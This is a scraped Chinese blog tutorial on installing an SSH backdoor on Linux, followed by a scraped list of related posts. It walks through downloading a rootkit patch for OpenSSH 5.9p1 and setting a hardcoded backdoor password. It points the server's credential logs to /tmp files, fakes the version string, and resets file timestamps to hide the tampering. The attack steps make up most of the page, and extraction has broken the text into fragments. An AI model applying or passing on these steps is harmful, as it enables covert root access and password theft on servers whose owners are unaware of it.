Linux 安全之SSH後門
http://redkey.blog.51cto.com/335290/1345091
一.檢視SSH版本
[[email protected] vmshare]
# ssh -V
OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010
二.下載SSH 原始碼包
原始碼包:
http:
//openbsd
.org.ar
/pub/OpenBSD/OpenSSH/portable/openssh-5
.9p1.
tar
.gz
後門檔案:
http:
//core
.ipsecs.com
/rootkit/patch-to-hack/0x06-openssh-5
.9p1.patch.
tar
.gz
三.備份原有ssh配置檔案
[[email protected] ~]
# cp -p /etc/ssh/sshd_config{,.bak}
四.編譯安裝
[[email protected] vmshare]
# tar -xzvf openssh-5.9p1.tar.gz
[[email protected] vmshare]
# tar -xzvf 0x06-openssh-5.9p1.patch.tar.gz
[[email protected] vmshare]
# cd openssh-5.9p1.patch/
[ [email protected] openssh-5.9p1.patch]
# cp sshbd5.9p1.diff ../openssh-5.9p1
[[email protected] openssh-5.9p1.patch]
# cd ../openssh-5.9p1
[[email protected] openssh-5.9p1]
# patch < sshbd5.9p1.diff
patching
file
auth.c
patching
file
auth-pam.c
patching
file
auth-
passwd
.c
patching
file
canohost.c
patching
file
includes.h
patching
file
log.c
patching
file
servconf.c
patching
file
sshconnect2.c
patching
file
sshlogin.c
patching
file
version.hxiu
設定後門密碼"redkey"
[[email protected] openssh-5.9p1]
# vim includes.h
175 int secret_ok;
176 FILE *f;
177
#define ILOG "/tmp/ilog"
178
#define OLOG "/tmp/olog"
179
#define SECRETPW "redkey"
180
#endif /* INCLUDES_H */
修改版本資訊(SSH_VERSION):
/* $OpenBSD: version.h,
v
1.62 2011
/08/02
23:13:01 djm Exp $ */
#define SSH_VERSION "OpenSSH_5.3p1"
#define SSH_PORTABLE "p1"
#define SSH_RELEASE SSH_VERSION SSH_PORTABLE
編譯&安裝
[[email protected] openssh-5.9p1]
# ./configure --prefix=/usr/ --sysconfdir=/etc/ssh/ --with-pam --with-kerberos5
[[email protected] openssh-5.9p1]
# make
[[email protected] openssh-5.9p1] # make install
|
五.還原sshd_config檔案時間戳
[[email protected]
ssh
]
# touch -r sshd_config.bak ssh_config
六.重啟服務或重新載入配置
[[email protected]
ssh
]
# service sshd reload
七.常見問題
1.需要安裝的軟體包
openssl openssl-devel pam-devel
2.編譯常見的問題
編譯過程中可能出現的報錯:
configure: error: *** zlib.h missing – please
install
first or check config.log
#
#yum install zlib-devel
configure: error: *** Can't
find
recent OpenSSL libcrypto (see config.log
for
details) ***
#
#yum install openssl openssl-devel
相關推薦
Linux 安全之SSH後門
http://redkey.blog.51cto.com/335290/1345091 一.檢視SSH版本 [[email protected] vmshare]# ssh -V OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29
Linux安全之SSH 密鑰創建及密鑰登錄,禁止密碼登陸
onf 但是 set 必須 兩個 過程 strong tps 全部 //參考原文鏈接 他們有圖哦https://blog.csdn.net/nahancy/article/details/79059135 http://www.runoob.com/w3cnote/set
linux基礎之ssh
查看系統 去掉 log max 自動退出 技術分享 服務 例子 pen 一、ssh安裝 查看系統是否安裝試試:rpm -qa | grep openssh,下圖所示則為已安裝。 若系統為安裝ssh,則配置好yum開始安裝ssh。 安裝命令:yum install -y o
N天學習一個linux命令之ssh-keygen
IE provides filename mes pll pub cif sts key 用途 生成ssh加密算法需要使用到的秘鑰以及管理和轉換 用法 ssh-keygen [-q] [-b bits] -t type [-N new_passphrase] [-
Linux命令之ssh
emctl 客戶 socks 設置 可靠 並且 選項 lease ger ssh [-l login_name] hostname | user@hostname [command] ssh [-afgknqstvxACNTX1246] [-b bind_address]
linux安全之歷史命令追蹤
修改配置檔案檢視任何登入主機的使用者在任何時間執行的任何命令 一 為history 命令新增日期時間顯示 [[email protected] ~]# vim /etc/bashrc HISTTIMEFORMAT="%Y-%m-%d:%H-%M-%S:`whoami`: "
Linux安全之SYN攻擊原理及其應對措施
TCP自從1974年被髮明出來之後,歷經30多年發展,目前成為最重要的網際網路基礎協議,但TCP協議中也存在一些缺陷。 SYN攻擊就是利用TCP協議的缺陷,來導致系統服務停止正常的響應。 SYN攻擊原理: TCP在傳遞資料前需要經過三次握手,SYN攻擊的原理就是向伺服器傳送SYN資料包,並偽造源I
linux之 ssh連接服務器,WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!
ddl dmi sys 更換 list admin ble sha256 ini [[email protected] ~]# ssh localhost@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Linux之SSH密鑰認證
onf data- 啟用 般的 aid com 通過 進行 登錄 1、SSH協議的認識 SSH 為 Secure Shell 的縮寫,由 IETF 的網絡小組(Network Working Group)所制定;SSH 為建立在應用層基礎上的安全協議。SSH 是目前較可靠,
Linux 之 SSH 理解
SSHSSH 理解 一、服務端sshd_conf配置文件理解 Port 22 #ssh 連接默認端口 PermitRootLogin yes #是否允許root用
linux安全配置-將ssh服務隱藏於Internet(端口碰撞)
交流 sbin 開啟 信息 done opts 必須 image for 一:設備信息 要保護的服務器:ubuntu14.04 192.168.1.38 ssh測試機:kali2.0 192.168.1.47 二:配置過程 1
【Linux】創建安全的SSH登錄賬戶
port res pre 密碼認證 bit all 文件內容 總結 Opens 在實際的產品服務發布環境中,Linux服務器通常禁止使用遠程ROOT賬戶登錄,僅僅允許最小權限的遠程賬戶使用SSH登錄後,再切換賬戶達到管理服務器的目的。下面我們就總結一下如何創建安全的SSH登
Linux Nginx之HTTPS網絡安全訪問服務
無法 獲得 如果 語言 cor 算法 som 解密 lis 第1章 HTTPS網絡安全訪問服務1.1 網絡安全涉及的問題①. 網絡安全問題-數據機密性問題傳輸的數據可能會被第三方隨時都能看到②. 網絡安全問題-數據完整性問題傳輸的數據不能隨意讓任何人進行修改③. 網絡安全問
安全之路 —— 利用端口復用技術隱藏後門端口
mil *** zcm 一位 標識 creator process count handle 簡介 前面我們介紹到我們可以用進程註入的方法,借用其他應用的端口收發信息,從而達到穿墻的效果,那麽今天介紹一種新的方法,叫做端口復用技術,他能夠與其他應用綁定同一個端口,但同時進
安全之路 —— C/C++實現後門的服務自啟動
net tom html 註冊表自啟動 bin hide any patch format 簡介 Windows NT系統後門要實現自啟動,有許多種方法,例如註冊表自啟動,映像劫持技術,SVCHost自啟動以及本章節介紹的服務自啟動等方法,其中服務自啟動相對於上述其他三種
安全之路 —— 利用SVCHost.exe系統服務實現後門自啟動
cas default wait cal tis lis success 放置 簡介 簡介 在Windows系統中有一個系統服務控制器,叫做SVCHost.exe,它可以用來管理系統的多組服務。它與普通的服務控制不同的是它采用dll導出的ServiceMain主函數實現服
Linux之SSH免密登錄
key lin tps ip地址 .com 進入 實驗方法 技術分享 註意 實驗方法: 開啟兩臺虛擬機A和B,IP地址分別為192.168.222.12、192.168.222.10 在虛擬機A下做如下操作,生成公鑰和密鑰: [root@localhost ~]# ss
【linux執行緒】執行緒安全之條件變數
條件變數用法: 條件變數一般和互斥量配合,保護執行緒安全或者完成同步資料的功能。 #include <pthread.h> #define INFINITE 0xFFFFFFFF #ifndef ETIMEDOUT #define ETIMEDOUT 10060 #endif
Linux日常之允許或禁止指定使用者或IP進行SSH登入
目錄 Linux之 允許或禁止指定使用者或IP進行SSH登入 1. 使用者 SSH登入 2. IP SSH登入 Linux之 允許或禁止指定使用者或IP進行SSH登入 暫時只瞭解到了hosts.allow和hos
linux安全模組學習之LSM的介紹實現
相關背景介紹 近年來Linux系統由於其出色的效能和穩定性,開放原始碼特性帶來的靈活性和可擴充套件性,以及較低廉的成本,而受到計算機工業界的廣泛關注和應用。 但在安全性方面,Linux核心只提供了經典的UNIX自主訪問控制(root使用者,使用者ID,模式位安全機制),以及部分的支援了POS